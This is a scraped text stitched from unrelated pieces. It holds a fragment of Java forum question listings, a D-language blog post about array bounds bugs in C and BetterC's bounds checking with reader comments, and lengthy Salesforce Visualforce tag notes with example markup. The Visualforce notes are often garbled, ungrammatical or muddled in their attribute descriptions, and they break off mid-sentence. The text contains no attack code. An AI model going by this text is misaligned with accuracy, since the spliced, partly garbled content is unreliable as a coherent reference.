of the default selected tab when the page loads. <apex:tab> defines the tab name, label and id. - <apex;detail/> this is a self sustained tag gives the detail page of each account tab selected and the attribute RELATED list can be a Boolean one. - <apex:related list> in this we used SUBJECT and LIST. The attribute Subject specifies the parent record from which the data or the related list has to be mentioned in your case it’s ACCOUNT. LIST: name of the child that should be appeared on the tab CHILDS of account.. Note: Redirecting the visualforcepage to the listviewpage using single tag. <apex:page Visualforce Scenario 3: The followingvisualforce page displays the Contacts for particular account in a separate window as the table (format is standard salesforce page) Page Name=”ContactsForAccount” <apex: <apex:pageBlock We are viewing the Contacts for this <b>{!account.name}</b> Account. </apex:pageBlock> <apex:pageBlock <apex:pageBlockTable <apex:column <apex:column <apex:column <apex:column </apex:pageBlockTable> </apex:pageBlock> </apex:page> Create the button called “ContactsForAccount” on Account Object and override above visualforce page with this button. Explination: - Starting tag for a visualforcepage is <apex:page> and this follows standard object ACCOUNT. - Forming a new page block which gives the user name and Account holder name. - Forming a new page block with title as CONTACTS. - And then retrieving the contact fields using account and the field label are shown as column headers. Visualforce Scenario 4: Create the Visualforce page with the following code. This is the example for custom controller. Page Name=”PageReference” <apex:page <apex:form> <apex:pageBlock <apex:pageblockSection <apex:inputField <apex:inputField <apex:inputField <apex:inputField <apex:inputField <apex:inputField </apex:pageblockSection> <apex:pageblockSection <apex:inputField <apex:inputField <apex:inputField <apex:inputField <apex:inputField <apex:inputField <apex:inputField </apex:pageblockSection> <apex:pageBlockButtons> <apex:commandButton </apex:pageBlockButtons> </apex:pageBlock> </apex:form> </apex:page> My Custom Controller Class: public class MyCustomController{ Public Account acc; public MyCustomController(){ acc = [select id,Name,Phone,Industry,Website,Active__c,Rating,BillingCity,Description,Fax, ShippingCity,AnnualRevenue,BillingCountry,ShippingCountry from Account where id=:ApexPages.currentPage().getParameters().get('Id')]; } public Account getAccount() { return acc; } public PageReference saveMethod() { update acc; PageReference pageRef = new ApexPages.StandardController(acc).view(); return pageRef; } } Create the “Detail Page Link” with the name “PageReference” on Account Object. While creating select “Execute JavaScript” as the behavior and “onClick JavaScript” as the Content Source parent.window.location.replace("/apex/PageReference?id={!Account.id}"); Add the PageReference link to the Account Layout Update the field values then click on “Save the Page” button in the above window,we will get the Standard Account detail page Visualforce Senarion 5: Create the Visualforce page with the following code. This is the example for custom controller. Page Name=”WithoutPageReference” <apex:page <apex:form> <apex:pageBlock <apex:pageBlockButtons> <apex:commandButton </apex:pageBlockButtons> <apex:pageBlockSection <apex:inputField <apex:inputField <apex:inputField <apex:inputField </apex:pageBlockSection> </apex:pageBlock> </apex:form> </apex:page> My second Controller class: public class MySecondController { Public Opportunity opp; public MySecondController(){ opp= [select id,Name,DeliveryInstallationStatus__c,TrackingNumber__c,CloseDate fr om Opportunity where id=:ApexPages.currentPage().getParameters().get('Id')]; } public Opportunity getOpportunity () { return opp; } public PageReference SaveMethod() { update opp; return null; } } Create the “Detail Page Link” with the name “WithoutPageReference” on Opportunity Object. While creating select “Execute JavaScript” as the behavior and “onClick JavaScript” as the Content Source Follow the java script to call a visualforce page parent.window.location.replace("/apex/WithoutPageReference?id={!Opportinuty}.id}"); Go to Opportunity detail page and click on the WithoutPageRef link Update the field values in the following window and click on “Save The Opportunity” button, then values will be updated but redirects to the same page but not to the opportunity detail page Visualforce Senarion 6: Before we have written trigger saying that when the Contact is created by checking Contact Relationship checkbox, then Contact Relationship will be created for that contact automatically. Create the visualforce page with the following code. Create the button called "Create Multiple Contact Relationship "on Account object and once we click on this button on account detail page, then Contacts will be populated which don't have Contact Relationships. Visualforce Code: Page Name="ContactRelationShips" <apex: <apex:form> <apex:pageBlock> <apex:sectionHeader <center> <apex:commandButton </center> <apex:pageBlockTable <apex: <apex:facetAction</apex:facet> <apex:inputCheckbox> </apex:inputCheckbox> </apex:column> <apex:column> <apex:facetContact Name</apex:facet> <apex:outputText </apex:column> <apex:column> <apex:facetTitle</apex:facet> <apex:outputText </apex:column> <apex:column> <apex:facetEmail</apex:facet> <apex:outputText </apex:column> <apex:column> <apex:facetPhone</apex:facet> <apex:outputText </apex:column> </apex:pageBlockTable> </apex:pageBlock> </apex:form> </apex:page> MultipleContactRelationships Class: public with sharing class MultipleContactRelationships { public MultipleContactRelationships(ApexPages.StandardController controller) { } public List<Contact> ContactList{get;set;} Public List<Contact>getConres() { Contact c = new Contact(); ContactList=[select id, Name,Title,Email,Phone from Contact where Accountid=:ApexPa ges.currentPage().getParameters().get('id') and Contact_Relationship__c=true ]; system.debug('********'+ ContactList); return ContactList; } } Button Creation: Create the button called "Create Multiple Contact Relationship" on Account Object with the following Java Script Parent.window.location.replace("/apex/ContactRelationShips?id={!Account.id}"); The following window will come when we click on "Create Multiple Contact Relationship" on the above window
https://tekslate.com/tags-used-create-visualforce-pages
CC-MAIN-2019-43
refinedweb
5,089
51.28
In several applications, its required to create some requests(either get or post ) on a web resource and process the received data from the server script itself. In popular scripting language php, using guzzle library helps to do such works perfectly. Who are using c# and .net platform for developing web applications, they also need to have such facilities. Luckily, there are already some built-in classes in .net framework to give native supports. However, this native support of performing HTTP requests using C# are very raw and can be generalized as a wrapper. I will provide c# code sample of a complete wrapper class that you can reuse on your application with minimal customization. Update: At the time of writing this article, I didn’t find any other useful library, why I created this very basic/simple wrapper class. However, there is now more advanced way to perform such operation using restsharp client. You can refer to this if you are about to perform complete http requests. However, still, the following simple class can help you understand the internal mechanism how a request constructed. As I am going to provide a solution already, so I am not going to explain internal mechanism in details. But, feel free to explore the class if you want, its pretty straight forward. I will how to use that class and what format to follow to pass parameters. Alternatively, you can fork a copy from github also. The github url for this is: Here you go with the complete code of the class: public class MyWebRequest { private WebRequest request; private Stream dataStream; private string status; public String Status { get { return status; } set { status = value; } } public MyWebRequest(string url) { // Create a request using a URL that can receive a post. request = WebRequest.Create(url); } public MyWebRequest(string url, string method) : this(url) { if (method.Equals("GET") || method.Equals("POST")) { // Set the Method property of the request to POST. request.Method = method; } else { throw new Exception("Invalid Method Type"); } } public MyWebRequest(string url, string method, string data) : this(url, method) { // Create POST data and convert it to a byte array. string postData = data;(); } public string GetResponse() { // Get the original response. WebResponse response = request.GetResponse(); this.Status = ((HttpWebResponse)response).StatusDescription; // Get the stream containing all content returned by the requested server. dataStream = response.GetResponseStream(); // Open the stream using a StreamReader for easy access. StreamReader reader = new StreamReader(dataStream); // Read the content fully up to the end. string responseFromServer = reader.ReadToEnd(); // Clean up the streams. reader.Close(); dataStream.Close(); response.Close(); return responseFromServer; } } Basic Understanding Of This Class: So, as you can see, constructor can be of three different types. You must need to pass the URL. It will by default set method as ‘GET’. If you need to use ‘POST’ method, then please pass it as second parameter. Third parameter is for pass the ‘data’, that you may want to post to server. And the “GetResponse()” method will return the result in plain text format, so you need to process it as per your need. You can check whether any error occurred or not by using the “Status” property. Just to clear a confusion from many readers, it doesn’t matter what kind of application you are working on, either desktop application or Asp.NET web application, this class can be used in the same way for both types. Cheers! Using This C# HTTP Request Class: Implementing this class to an application is quite easy. First you have to create an instance of the class and then call a parameter less function to receive the response data. So, all things to feed it is in the constructor calling. There are three different type of constructor you can call. One with one parameter(web resource url), it simply download the data of the web page. needed). Third one, with 3 parameters(url, method and data). For url parameter, you must have to use a valid uri. For method parameter, you have to use “GET” or “POST” depending on your request type. Third parameter should be all data url encoded should be like this format: “variable1=value1&variable2=value2″ Here is a sample code snippet to make a complete request and get the string response: //create the constructor with post type and few data MyWebRequest myRequest = new MyWebRequest("","POST","a=value1&b=value2"); //show the response string on the console screen. Console.WriteLine(myRequest.GetResponse()); This is it, Let me know if you are having any complexities here and also if you want any more features to added here. I will try to do so. Happy coding 😀 I am trying to make call to pages in facebook Graph API and retrive in my application. Do you suggest me to go through install Facebook C# SDK or to use the code above for accessing. Kind regards, Naim Depends on the spec domain. If you are creating an fully Facebook based application, then I will suggest you to use the facebooksdk. For simple usage(and to understand better how they works), you can go with the manual approaches that i have discussed in few posts. Hope this helps. i need how to connect with user and server Hi Rana, Thanks for you post. I had a error at line 57 dataStream = request.GetRequestStream(); The error msg is “Cannot send a content-body with this verb-type” Is there any extra I need to do? Thanks Warm Regards Phil enter the method name as “POST” GET method does not work. The error msg is “Cannot send a content-body with this verb-type” what if I want to call a javascript function on a page? like: httpget(uri, “javascript:ChangeAcc()”); happy programming Modification for GET request working public MyWebRequest(string url, string method, string data) : this(url, method) { if (request.Method == “POST”) { // Create POST data and convert it to a byte array. byte[] byteArray = Encoding.UTF8.GetBytes(data); //(); } else { String finalUrl = string.Format(“{0}{1}”, url, “?” + data); request = WebRequest.Create(finalUrl); WebResponse response = request.GetResponse(); //Now, we read the response (the string), and output it. dataStream = response.GetResponseStream(); } } thank you Dear Sir, I have 2 doubts 1. I am not getting should I use same url or replace it to my domain url which I dont have. 2. Getting error at below line public string GetResponse() { // Get the original response. WebResponse response = request.GetResponse(); Error is WebException was unhandled by user code “The remote server returned an error: (405) Method Not Allowed.” Kindly help me to resolve it. How would you implement it using a username and password? how do i close the connections immediately? i am getting the 4 instances …. it is not necessary to close a stream when you’ve already called Close() on its assigned StreamWriter/Reader. it does it for you automatically. it’s also a good practice to use the “using” keyword when working with streams. for instance if we have a stream ‘s’ and string ‘stuff’ using (StreamWriter sw = new StreamWriter (s) ) { sw.Write (stuff); } once the end of the block is reached, the StreamWriter object gets disposed, calling Close() on itself before that happens and in turn closing the underlying stream as well. I’m using the following convenience methods to write to and read from streams when working with http requests, feel free to use them yourself. public static void StringToStream(Stream stream, string content) { using (StreamWriter writer = new StreamWriter(stream)) { writer.Write(content); } } public static string StringFromStream(Stream stream) { string content; using (StreamReader reader = new StreamReader(stream)) { content = reader.ReadToEnd(); } return content; } How do i post and retrieve data to/fro a remote MS SQL using the this http webserver Hello. I’m getting: Cannon implicitly convert type ‘MyWebRequest’ to ‘System.Net.WebRequest’, On WebRequest myRequest = new MyWebRequest(“”,”POST”,”a=value1&b=value2″); It would be very helpful to see what ‘using’ statements you would need in both the example code and the class that you created. I find so many examples were people give code but do not give the using statements to know which areas of the .net library to call. This would be extremely helpful for people are are just starting out and don’t have common library’s or using statements memorized. Thank you Can you please elaborate how to run this program in vs Also is it necessary to install IIS to run this program? You can run it on either a desktop application or on web application. This will facilitate you in cases, where your application itself need to request to other external web http get or post request and process the response. You don’t need to install iis. Hi, im need get one request of another website, they send to me via POST, but i dont know how i get in my page, they send 2 parameters: Like that: notificationCode=766B9C-AD4B044B04DA-77742F5FA653-E1AB24 notificationType=transaction Im using C# What i go put on pageload to get this parameters? Thanks for all help. Hi, you can handle them is the same way you handle your own site’s GET/POST request. Just need to grab the ‘Request.Params[“SomeID”]’ or Request.Querystring(“parameter1″) in your c# code, depending what type of http request they are sending to your application. Hope this helps. Hello When i am using this code then i am getting NULL value in return when i am accessing my PHP file directly from Browser. and even in OUTPUT window of VS, it display just the value of a only that is “Value1″ nothing else. my client side application is in C# using help from your code and my Service Side application is in PHP and the statement i am using in my PHP file is and one more consultation, i would like to post data that the client will enter in Textbox and i tried to put that in query but failed. So, it would be really appreciable if you can help me for that also along with the NULL value Return Thanks for your code. It’s very useful Thanks Ali, very useful Very Useful! What a pain in the ass the default WebRequest with POST parameters… Thank you very much! Nice article. As per my research on this topic, I have seen that we can improve the security concerns regarding GET request by using HTTPS protocol. I want to get response from this url:” Note: this the original web but i got this error message: “The operation has timed out” Could you tell me is there something wrong from my code, here is my code: //create the constructor with post type and few data MyWebRequest myRequest = new MyWebRequest(“”, “POST”, “Domain=HASANUDDIN.INFO&ApiKey=testapi&Password=testpass”); //show the response string on the console screen. Console.WriteLine(myRequest.GetResponse()); as far I can track, you need to provide “GET” instead of “POST”(as all variables in url are passed in GET method). May be the server only accepts GET requests. thx, your code is very usefull, but how to make this webrequest class asyncronously ? Good post to get the initial structure, but as mentioned in previous comments, this only works if a response of 200 is received, but errors out on other responses. This is not hard to add, but just don’t implement into a solution without adding necessary additional code. thanks you so much!.. Hi, How could you use this to replace this Curl statement curl -H “X-Auth-User: bryanoliver” -H “X-Auth-Expires: 1406485297″ -H “X-Auth-Key: 946ddd08f5fbcb3ddb0c91e3785f0630″ “-H” “Accept: application/xml” “″ {“The remote server returned an error: (500) Internal Server Error.”} Dear Ali Ahsan, How can I use this in a multiple call? To give you the idea. I created a 2 method that calls different data. For instance: checkExisting_data() – for getting hours list addComboList() – for getting projects list But when I put this both on the Form Load, only one method is working and the other is not but when I commented the first one the second method works. So i guess there is nothing wrong with my method //Sample Code Please advise! Thank you in advance This script does not RUN.. any ideas. also i want to know how i can get the URL connect to display TRUE as in connection is TRUE . That way i know the code works and POST. THis is what i have but it does not work. I want to POST to URL with the STRING like:. can anyone help.? Code: Great class man! really simple and got it working in a second! Thanks for your efforts!
http://codesamplez.com/programming/http-request-c-sharp
CC-MAIN-2015-22
refinedweb
2,099
64.3
Unit Testing in .NET Core using dotnet test By Steve Smith and Bill Wagner View or download sample code Note This topic applies to .NET Core 1.0. Creating the Projects Writing Libraries with Cross Platform Tools has information on organizing multi-project solutions for both the source and the tests. This article follows those conventions. The final project structure will be something like this: /unit-testing-using-dotnet-test |__global.json |__/src |__/PrimeService |__Source Files |__project.json |__/test |__/PrimeService.Tests |__Test Files |__project.json In the root directory, you'll need to create a global.json that contains the names of your src and test directories: { "projects": [ "src", "test" ] } Creating the source project Then, in the src directory, create the PrimeService directory. CD into that directory, and run dotnet new -t lib to create the source project. Rename Library.cs as PrimeService.cs. To use test-driven development (TDD), you'll create a failing implementation of the PrimeService class: using System; namespace Prime.Services { public class PrimeService { public bool IsPrime(int candidate) { throw new NotImplementedException("Please create a test first"); } } } Creating the test project Next, cd into the 'test' directory, and create the PrimeServices.Tests directory. CD into the PrimeServices.Tests directory and create a new project using dotnet new -t xunittest. dotnet new -t xunittest creates a test project that uses xunit as the test library. The generated template configured the test runner at the root of project.json: { "version": "1.0.0-*", "testRunner": "xunit", // ... } The template also sets the framework node to use netcoreapp1.0, and include the required imports to get xUnit.net to work with .NET Core RTM: "frameworks": { "netcoreapp1.0": { "imports": [ "dotnet54", "portable-net45+win8" ] } } The test project requires other packages to create and run unit tests. dotnet new added xunit, and the xunit runner. You need to add the PrimeService package as another dependency to the project: "dependencies": { "xunit":"2.1.0", "dotnet-test-xunit": "1.0.0-rc2-192208-24", "PrimeService": { "target": "project" } } Notice that the PrimeService project does not include any directory path information. Because you created the project structure to match the expected organization of src and test, and the global.json file indicates that, the build system will find the correct location for the project. You add the "target": "project" element to inform NuGet that it should look in project directories, not in the NuGet feed. Without this key, you might download a package with the same name as your internal library. You can see the entire file in the samples repository on GitHub. After this initial structure is in place, you can write your first test. Once you verify that first unit test, everything is configured and should run smoothly as you add features and tests. Creating the first test The TDD approach calls for writing one failing test, then making it pass, then repeating the process. So, let's write that one failing test. Remove program.cs from the PrimeService.Tests directory, and create a new C# file with the following denotes a method as a single test. Save this file, then run dotnet build to build the test project. If you have not already built the PrimeService project, the build system will detect that and build it because it is a dependency of the test project. Now, execute dotnet test to run the tests from the console. The xunit test runner has the program entry point to run your tests from the Console. dotnet test starts the test runner, and provides a command line argument to the testrunner indicating the assembly that contains your tests. Your test fails. You haven't created the implementation yet. Write the simplest code to make this one test pass: public bool IsPrime(int candidate) { if(candidate == 1) { return false; } throw new NotImplementedException("Please create a test first"); } Adding More Features Now, that you've made one test pass, it's time to write more. There are a few other simple cases for prime numbers: 0, -1. You could add those as new tests, with the [Fact] attribute, but that quickly becomes tedious. There are other xunit attributes that enable you to write a suite of similar tests. A Theory represents a suite of tests that execute the same code, but have different input arguments. You can use the [InlineData] attribute to specify values for those inputs. Instead of creating new tests, leverage these two attributes to create a single theory that tests some values less than 2, and you'll see that two of these tests fail. You can make them pass by changing the service. You need to change the if clause at the beginning of the method: if(candidate < 2) Now, these tests all pass. You continue to iterate by adding more tests, more theories, and more code in the main library. You'll quickly end up with the finished version of the tests and the complete implementation of the library. You've built a small library and a set of unit tests for that library. You've structured this solution so that adding new packages and tests will be seamless, and you can concentrate on the problem at hand. The tools will run automatically. Tip On Windows platform you can use MSTest. Find out more in the Using MSTest on Windows document.
https://docs.microsoft.com/en-us/dotnet/articles/core/testing/unit-testing-with-dotnet-test
CC-MAIN-2017-04
refinedweb
889
66.74
It's notable that the SELinux developers have been appearing to say that there *was* a way to implement AppArmor atop SELinux, and indeed everything else security-related one could possibly imagine that was any use to anyone, and that therefore LSM was unnecessary. It always struck me as the sort of thing that was *bound* to be proved wrong. Kernel Summit 2006: Security Posted Jul 19, 2006 11:45 UTC (Wed) by Method (guest, #26150) [Link]SELinux is implemented under a framework called Flask (). It abstracts the details of the underlying hooks from the security server (which just cares about giving the requested decision).) Kernel Summit 2006: Security Posted Jul 20, 2006 23:39 UTC (Thu) by crispin (guest, #2073) [Link]"... the Flask architecture within. Kernel Summit 2006: Security Posted Jul 21, 2006 0:55 UTC (Fri) by Method (guest, #26150) [Link]You are right,]It's odd that all the points you raise in this comment are ones which Mike Hearn comprehensively demolished in his comment to the very post you link to. Kernel Summit 2006: Security Posted Jul 22, 2006 19:07 UTC (Sat) by Method (guest, #26150) [Link]Comprehensively? Hardly.. Kernel Summit 2006: Security Posted Jul 24, 2006 16:13 UTC (Mon) by crispin (guest, #2073) [Link]... so lets take just one argument at a time: "paths are ambiguous".? Kernel Summit 2006: Security Posted Jul 24, 2006 17:01 UTC (Mon) by Method (guest, #26150) [Link]I'm actually not going to go through this in LWN comments, its very unproductive. However, you had one entirely false statement in your comment:. Kernel Summit 2006: Security Posted Jul 24, 2006 20:12 UTC (Mon) by nix (subscriber, #2304) [Link]It doesn't take a genius to grasp that AppArmor counters this by banning namespace changes (other than chroot(), which can be handled) for covered applications. Yes, this means no fancy shared subtree hacks can be carried out by apps that are *actually covered*, but since shared subtree hacks are often done by login PAM modules, and that's not going to be stuff you're going to protect with AppArmor...]> The great thing about this is that, for example, your bind Kernel Summit 2006: Security Posted Jul 25, 2006 21:04 UTC (Tue) by dlang (subscriber, #313) [Link]and the reply to this by AppArmor was that they are enhancing AA to look at the path to the file looking through the namespace mappings.
https://lwn.net/Articles/191858/
CC-MAIN-2018-05
refinedweb
407
53.85
Google has always impressed me with the quality of their API libraries allowing us to interface with their products in a somewhat straight-forward manner. In the past, I’ve used a couple of Google’s API’s for implementing YouTube video’s or Checkout merchant within my own sites. What makes life even easier is that the API’s are available in my native programming framework - .NET. Google were quite slow in launching an official API upon Google Plus’s initial release and even though unofficial API’s were available, I thought it would be best to wait until an official release was made. I’ve been playing around with Google’s .NET API for a couple weeks now and only just had the time to blog about it. I am hoping to make this beginners guide a three part series: - Profile Data - User Posts - User’s +1’s So let’s get to it! Today, I shall be showing you the basic API principles to get you started in retrieving data from your own Google+ profile. Prerequisites Before we can start thinking about coding our page to retrieve profile information, it’s a requirement to register your application by going to:. Providing you already have an account with Google (and who hasn’t?), this shouldn’t be a problem. If you don’t see the page (below), a new API Project needs to be created. Only the Client ID, Client Secret and API Key will be used in our code allowing us to carry our API requests from our custom application. Next, download the Google Plus .NET Client. My own preference is to use the Binary release containing compiled .NET Google Client API and all dll's for all supported services. Building A Custom Profile Page - Create a new Visual Studio Web Application. - Unzip the Binary Zip file containing all Google service DLL’s. Find and reference the following DLL’s in your project: - Google.Apis.dll - Google.Apis.Authentication.OAuth2.dll - Google.Apis.Plus.v1.dll - Copy and paste the following front-end HTML code: <h2> About Me </h2> <br /> <table> <tr> <td valign="top"> <asp:Image</asp:Image> </td> <td valign="top"> <strong>Name:</strong> <asp:Label</asp:Label> <br /><br /> <strong>About Me:</strong> <asp:Label</asp:Label> <br /> <strong>Gender:</strong> <asp:Label</asp:Label> <br /><br /> <strong>Education/Employment:</strong> <asp:Literal</asp:Literal> </td> </tr> <tr> <td colspan="2" valign="middle"> <asp:HyperLinkGo to my Google+ profile</asp:HyperLink> </td> </tr> </table> - Copy and paste the following C# code: using System; using System.Collections.Generic; using System.Linq; using System.Web; using System.Web.UI; using System.Web.UI.WebControls; using System.Text; using Google.Apis.Authentication.OAuth2.DotNetOpenAuth; using Google.Apis.Authentication.OAuth2; using Google.Apis.Plus.v1; using Google.Apis.Plus.v1.Data; namespace GooglePlusAPITest { public partial class About : System.Web.UI.Page { private string ProfileID = "100405991313749888253"; // My public Profile ID private string GoogleIdentifier = "<GoogleIdentifier>"; private string GoogleSecret = "<GoogleSecret>"; private string GoogleKey = "<GoogleKey>"; protected void Page_Load(object sender, EventArgs e) { if (!Page.IsPostBack) GetGooglePlusProfile(); } private void GetGooglePlusProfile() { var provider = new NativeApplicationClient(GoogleAuthenticationServer.Description); provider.ClientIdentifier = GoogleIdentifier; provider.ClientSecret = GoogleSecret; var service = new PlusService(); service.Key = GoogleKey; var profile = service.People.Get(ProfileID).Fetch(); // Profile Name DisplayName.Text = profile.DisplayName; //About me AboutMe.Text = profile.AboutMe; //Gender Gender.Text = profile.Gender; // Profile Image ProfileImage.ImageUrl = profile.Image.Url; // Education/Employment StringBuilder workHTML = new StringBuilder(); workHTML.Append("<ul>"); foreach (Person.OrganizationsData work in profile.Organizations.ToList()) { workHTML.AppendFormat("<li>{0} ({1})", work.Title, work.Name); } workHTML.Append("</ul>"); Work.Text = workHTML.ToString(); //Link to Google+ profile GotoProfileButton.NavigateUrl = profile.Url; } } } Once completed, the page should resemble something like this: I think you can all agree this example was pretty straight-forward. We are simply using the people.get method which translates into the following HTTP request: Unless you really want to display my profile information on your site (who wouldn’t!), you can keep the code as it is. But you have the flexibility to change the “ProfileID” variable to an ID of your own choice. To find your Profile ID, read: How Do I Find My Google Plus User ID?.
https://www.surinderbhomra.com/Blog/2012/04/10/Beginners-Guide-To-Using-Google-Plus-NET-API-Part-1-Profile-Data
CC-MAIN-2020-34
refinedweb
699
51.44
This tutorial describes how to use Visual Studio to deploy an ASP.NET Framework-based Hello World app from a Windows development environment to a Compute Engine instance running Windows Server 2016. This tutorial assumes that you have Visual Studio 2017 IDE for Windows or later installed and are familiar with the .NET Framework and the C# language. You may also want to review our Quickstart for .NET in the App Engine Flexible Environment for the following reasons: - You want to deploy an ASP.NET Core-based Hello World app. - You want to deploy an app to the Beta App Engine Flexible environment, which provides automatic up and down scaling, as well as load balancing. - You want to deploy a Hello World app from the command line without using Visual Studio. This is part of the Getting Started with .NET on GCP series . After you complete the prerequisites listed under Before you begin, the tutorial takes about 15 minutes to complete. Before you begin Check off each step as you complete it. - check_box_outline_blank check_box Create a project in the Google Cloud Platform Console.If you haven't already created a project, create one now. Projects enable you to manage all Google Cloud Platform resources for your app, including deployment, access control, billing, and services. - Open the GCP Console. - In the drop-down menu at the top, select Create a project. - Click Show advanced options. - Give your project a name. - Make a note of the project ID, which might be different from the project name. The project ID is used in commands and in configurations. - check_box_outline_blank check_box Enable billing for your project, and sign up for a free trial. If you haven't already enabled billing for your project, enable billing now, and sign up for a free trial. Enabling billing allows the app to consume billable resources such as running instances and storing data. During your free trial period, you won't be billed for any services. Download and run the app We've created a simple Hello World app using .NET so you can quickly get a feel for deploying an app to Google Cloud Platform (GCP. After you've completed the prerequisites, you can download and deploy the Hello World sample app. This section guides you through getting the code and running the app locally. Get the Hello World app Download the sample as a zip file and extract it. Alternatively, you can clone the git repository. $ git clone Run the app on your local computer To open the app in Visual Studio 2017, double-click aspnet\1-hello-world\1-hello-world.sln. In Visual Studio, press F5 to build and run the app. You can see the Hello, World! message from the sample app displayed in the page. This page is delivered by a web server running on your computer. When you are ready to move forward, press Shift-F5 to stop the app. Hello World code review The code is a simple ASP.NET app. /// <summary> /// The simplest possible HTTP Handler that just returns "Hello World." /// </summary> public class HelloWorldHandler : HttpMessageHandler { protected override Task<HttpResponseMessage> SendAsync(HttpRequestMessage request, CancellationToken cancellationToken) { return Task.FromResult(new HttpResponseMessage() { Content = new ByteArrayContent(Encoding.UTF8.GetBytes("Hello World.")) }); } }; public static void Register(HttpConfiguration config) { var emptyDictionary = new HttpRouteValueDictionary(); // Add our one HttpMessageHandler to the root path. config.Routes.MapHttpRoute("index", "", emptyDictionary, emptyDictionary, new HelloWorldHandler()); } Running Hello World on GCP Create and configure a new Compute Engine instance First, use Google Cloud Platform Marketplace to create a new Compute Engine instance that has Windows Server 2016, Microsoft IIS, ASP.NET, and SQL Express preinstalled. In the GCP Console, go to the GCP Marketplace ASP.NET Framework page. Set your deployment name and preferred Compute Engine zone. To deploy the Compute Engine instance, click Deploy. Install Cloud Tools for Visual Studio To install Cloud Tools for Visual Studio, complete the following installation process: In Visual Studio, go to Tools > Extensions and Updates. In the left pane, click the Online tab from the left pane. Click Download and follow the prompts. To load the new extension, restart Visual Studio. Configure the Cloud Tools for Visual Studio to use your account In Visual Studio, launch Cloud Explorer by going to Tools > Google Cloud Tools > Show Google Cloud Explorer. To access GCP resources, add your Google account. Click Select or Create Account. Click Add account. Add a default Windows user to your new Compute Engine instance In Cloud Explorer, select the newly created project and expand Compute Engine. Right-click the VM instance that you created with GCP Marketplace and select Manage Windows credentials. Click Add credentials. Enter a username. Select Create a password for me and click Save. When prompted, Reset the password for [YOUR USERNAME] on the instance [INSTANCE YOU CREATED], click Reset. To close the Password window, click the Close button. To close the Windows Credentials window, click the Close button. Deploy the app to your Windows instance In the Visual Studio Solution Explorer pane, right-click your app and click Publish to Google Cloud. In the Publish dialog box, click Compute Engine. To build and deploy the sample app, click Publish. After publishing completes, Visual Studio opens the app in your default web browser. Congratulations! You now have a working ASP.NET app running on a Compute Engine instance. Cleaning up If you're done with the tutorials and want to clean up resources that you've allocated, see Cleaning Up.
https://cloud.google.com/dotnet/docs/getting-started/hello-world?hl=vi
CC-MAIN-2019-30
refinedweb
910
67.65